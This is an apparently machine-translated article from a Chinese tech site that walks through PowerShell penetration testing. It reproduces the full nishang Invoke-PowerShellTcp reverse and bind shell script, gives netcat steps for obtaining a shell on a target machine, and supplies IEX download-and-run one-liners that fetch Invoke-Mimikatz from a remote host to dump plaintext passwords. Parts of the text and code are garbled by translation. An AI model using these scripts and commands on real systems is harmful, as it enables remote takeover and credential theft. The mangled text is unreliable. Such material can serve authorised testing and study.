Shulou(Shulou.com)05/31 Report--

Editor to share with you a sample analysis of Powershell penetration testing, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

0x01 supplementary knowledge a command format-

Command-name request parameter name request parameter value [-

] [-

] [-

] b equivalent alias

Many commands have aliases and people who use DOS or Unix that can be familiar. An alias is a short form of command but its function is equivalent.

Command Aliases (command aliases) clear-host cls, clearformat-list flget-childitem gci, ls, dirget-content gc, cat, typeget-location gl, pwdget-member gmremove-item ri, rm, rmdir, del, erase, rdwrite-output write, echoc Enforcement Policy issues

The Powershell script execution policy does not allow any script execution by default. If we do not modify the execution policy, the following problems may occur when we run the script directly.

Solution.

First check the script execution policy settings, which can be done through the Get-ExecutionPolicyget-executionpolicy command. If Restricted is displayed, no scripts are allowed to be executed. Run powerhsell as an administrator and execute the command: the script can be executed after set-executionpolicy remotesigned returns.

0x02 Analysis TCP Interactive PowerShell script

The script is taken from the framework of nishang, a PowerShell attack framework that is a collection of PowerShell attack scripts and payloads. Nishang is widely used in all stages of penetration testing. Download address: https://github.com/samratashok/nishang.

First paste its TCP interactive PowerShell script (establishing a TCP forward connection or reverse connection shell) with the following code:

Function Invoke-PowerShellTcp {Invoke-PowerShellTcp-Reverse-IPAddress 192.168.254.226-Port 4444Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. Exampleps > Invoke-PowerShellTcp-Bind-Port 4444Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. Exampleps > Invoke-PowerShellTcp-Reverse-IPAddress fe80::20c:29ff:fe9d:b983-Port 4444Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must belistening on the given IP and port. .link http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.htmlhttps://github.com/nettitude/powershell/blob/master/powerfun.ps1https://github.com/samratashok/nishang comment # > [CmdletBinding (DefaultParameterSetName= "reverse")] Param ([Parameter (Position = 0, Mandatory = $true, ParameterSetName= "reverse")] [Parameter (Position = 0, Mandatory = $false) ParameterSetName= "bind")] [String] $IPAddress, [Parameter (Position = 1, Mandatory = $true, ParameterSetName= "reverse")] [Parameter (Position = 1, Mandatory = $true, ParameterSetName= "bind")] [Int] $Port, [Parameter (ParameterSetName= "reverse")] [Switch] $Reverse [Parameter (ParameterSetName= "bind")] [Switch] $Bind) try {# Connect back if the reverse switch is used. If ($Reverse) {$client = New-Object System.Net.Sockets.TCPClient ($IPAddress,$Port)} # Bind to the provided port if Bind switch is used. If ($Bind) {$listener = [System.Net.Sockets.TcpListener] $Port $listener.start () $client = $listener.AcceptTcpClient ()} $stream = $client.GetStream () [byte []] $bytes = 0.65535 |% {0} # Send back current username and computername $sendbytes = ([text.encoding]:: ASCII) .GetBytes ("Windows PowerShell running" As user "+ $env:username +" on "+ $env:computername +" `nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n ") $stream.Write ($sendbytes,0,$sendbytes.Length) # Show an interactive PowerShell prompt $sendbytes = ([text.encoding]:: ASCII) .GetBytes ('PS'+ (Get-Location). Path +'>) $stream.Write ($sendbytes,0,$sendbytes.Length) while (($I = $stream.Read ($bytes,0) $bytes.Length))-ne 0) {$EncodedText = New-Object-TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString ($bytes,0, $I) try {# Execute the command on the target. $sendback = (Invoke-Expression-Command $data 2 > & 1 | Out-String)} catch {Write-Warning "Something went wrong with execution of command on the target." Write-Error $_} $sendback2 = $sendback +'PS'+ (Get-Location). Path +'>'$x = ($error [0] | Out-String) $error.clear () $sendback2 = $sendback2 + $x # Return the results $sendbyte = ([text.encoding]:: ASCII). GetBytes ($sendback2) $stream.Write ($sendbyte,0) $sendbyte.Length) $stream.Flush ()} $client.Close () if ($listener) {$listener.Stop ()}} catch {Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port. " Write-Error $_}} a comment section

The comments section describes the outline, purpose, examples, reference links, and other information of the script.

Invoke-PowerShellTcp-Reverse-IPAddress 192.168.254.226-Port 4444Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. Exampleps > Invoke-PowerShellTcp-Bind-Port 4444Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. Exampleps > Invoke-PowerShellTcp-Reverse-IPAddress fe80::20c:29ff:fe9d:b983-Port 4444Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must belistening on the given IP and port. .link http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.htmlhttps://github.com/nettitude/powershell/blob/master/powerfun.ps1https://github.com/samratashok/nishang comments section # > b Param running parameters section

DefaultParameterSetName= "reverse" states that the reverse shell connection is used by default. Optional and mandatory parameters must use both reverse and bind. The optional default value is reverse, but $IPAddress and $Port must be set. Finally, the final value is obtained according to the content matching type entered.

[CmdletBinding (DefaultParameterSetName= "reverse")] Param ([Parameter (Position = 0, Mandatory = $true, ParameterSetName= "reverse")] [Parameter (Position = 0, Mandatory = $false, ParameterSetName= "bind")] [String] $IPAddress, [Parameter (Position = 1, Mandatory = $true, ParameterSetName= "reverse")] [Parameter (Position = 1, Mandatory = $true, ParameterSetName= "bind")] [Int] $Port [Parameter (ParameterSetName= "reverse")] [Switch] $Reverse, [Parameter (ParameterSetName= "bind")] [Switch] $Bind) c part of the main function try {# connection may go wrong, so an exception handling trt catch is used here. # determine whether there is a corresponding value. If there is a TCP reverse shell connection, the local machine acts as the client. If ($Reverse) {$client = New-Object System.Net.Sockets.TCPClient ($IPAddress,$Port)} # determines whether there is a corresponding value, and if there is a TCP forward shell connection, the local machine acts as the server. If ($Bind) {$listener = [System.Net.Sockets.TcpListener] $Port $listener.start () $client = $listener.AcceptTcpClient ()} # build data flow $stream = $client.GetStream () [byte []] $bytes = 0.65535 |% {0} # send information about the target to the attack Click $sendbytes = ([text.encoding]:: ASCII) .GetBytes ("Windows PowerShell running as user" + $env:username + "on" + $env:computername + "`GetBytes (C) 2015 Microsoft Corporation. All rights reserved.`n`n ") $stream.Write ($sendbytes,0,$sendbytes.Length) # Interactive message prompt $sendbytes = ([text.encoding]:: ASCII) .GetBytes ('PS'+ (Get-Location). Path +'>') $stream.Write ($sendbytes,0,$sendbytes.Length) # to determine whether the data has been transferred While (($I = $stream.Read ($bytes,0, $bytes.Length)-ne 0) {$EncodedText = New-Object-TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString ($bytes,0, $I) try {# execute command Then output $sendback = (Invoke-Expression-Command $data 2 > & 1 | Out-String)} catch {# exception handling Write-Warning "Something went wrong with execution of command on the target." Write-Error $_} # is used to return the current path $sendback2 = $sendback +'PS'+ (Get-Location). Path +'>'$x = ($error [0] | Out-String) # clear error $error.clear () $sendback2 = $sendback2 + $x # returns the ASCII encoded Data $sendbyte = ([text.encoding]:: ASCII). GetBytes ($sendback2) $stream.Write ($sendbyte) 0 stream.Flush () # refresh stream} # close the connection $client.Close () if ($listener) {$listener.Stop ()}} catch {# exception handling Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port. " The Write-Error $_} 0x03 script uses a to import command mode

Import command mode is to import the ps1 file to powershell and then run the function directly on the command line.

Import-Module'.\ Invoke-PowerShellTcp .ps1'

Reverse connection

Step 1: use nc to listen on local port 4444 on the attack machine (listen first and then connect, otherwise you will make an error. )

Step 2: the target machine runs the connection command

Invoke-PowerShellTcp-Reverse-IPAddress attack machine ip-Port attack plane listening port

Step 3: connect successfully and get shell

Forward connection

Step 1: target machine turns on monitoring

Invoke-PowerShellTcp-bind-port 4444

Step 2: attack aircraft nc connect target aircraft

Nc-nv 192.168.17.132 4444

Step 3: connect successfully and get the shell

B non-import command mode

This mode does not need to import powershell, but runs the script directly.

Forward connection

Step 1: add the execute monitoring command to the ps1 file

Invoke-PowerShellTcp-bind

Step 2: run the ps1 file, set the listening port, and turn on listening

.\ Invoke-PowerShellTcp.ps1

Step 3: the attack plane nc connects with the target plane to obtain shell

Reverse connection

Step 1: attack aircraft listening port

Nc-lvp 8888

Step 2: add the execute connection command to the ps1 file

Invoke-PowerShellTcp-reverse 192.168.17.134 8888

Step 3: get shell

0x04 Mimikatz combined with Powershell to obtain the account password of the target host

In the actual combat process, after obtaining low-privilege users, in order to expand the results, we have to increase our rights. Without 0day, the simplest way to increase rights is to directly obtain the administrator account password of the target host. When it comes to getting passwords, you have to mention Mimikatz. Mimikatz is an open source gadget written in C language, which is very powerful. It supports the extraction of plaintext passwords, hashes, PIN codes and Kerberos credentials from Windows system memory, as well as several hacker technologies such as pass-the-hash, pass-the-ticket, build Golden tickets and so on.

I'm talking about the use of Powershell in conjunction with Mimikatz. The experimental environment is window server 2008, a server of Tencent Cloud.

A local network environment runs

Step 1: download Invoke-Mimikatz.ps1

Invoke-Mimikatz.ps1 download address

Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

Step 2: run directly in one sentence

Powershell Import-Module.\ Invoke-Mimikatz.ps1;Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full"'# or local network environment http://192.168.1.1/powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://192.168.1.1/');Invoke-Mimikatz-DumpCreds"

Step 3: successfully obtain the plaintext password

B running in online network environment

Step 1: execute the command directly

Execute commands in Windows 2008 and above operating systems

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz-DumpCreds"

Note: the target must have normal access to the raw.githubusercontent.com network because you need to connect to download the ps1 file. Versions above Windows Server 2014 can only get NTLM values, but cannot get plaintext passwords normally.

Step 2: successfully obtain the plaintext password

The above is all the content of the article "sample Analysis of Powershell Penetration Test". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.